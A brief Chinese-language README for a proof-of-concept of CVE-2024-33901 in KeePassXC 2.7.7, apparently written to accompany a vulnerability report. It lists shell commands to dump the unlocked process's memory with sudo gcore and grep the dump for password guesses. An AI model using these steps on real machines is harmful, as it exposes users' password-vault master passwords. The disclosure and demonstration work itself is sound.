用于演示 KeePassXC 2.7.7 中 CVE-2024-33901 漏洞的简短程序
该报告可能需要在类中附上源代码链接,所以我才创建了这个仓库
打开 KeePassXC 并认证数据库
在数据库已认证的情况下,为其创建内存转储文件
这可以通过获取 PID 来实现,可以使用以下命令获取 PID:
ps aux | grep keepassxc
然后运行以下命令:sudo gcore -o keepassxc_dump PID_HERE
例如,如果你获取到的 PID 是 1234,那么命令应为:
sudo gcore -o keepassxc_dump 1234
最后,你可以运行以下命令:cat keepassxc_dump.PID_HERE | strings | grep "password guess here"
因此,如果 PID 是 1234,命令应为:
cat keepassxc_dump.1234 | strings | grep "password guess here"
一旦创建了内存转储文件,即使数据库再次被锁定或 KeePassXC 被关闭,也可以执行该攻击。
所提供的 Python 代码会执行所有这些步骤,并根据所提供的文本文件尝试多次密码猜测。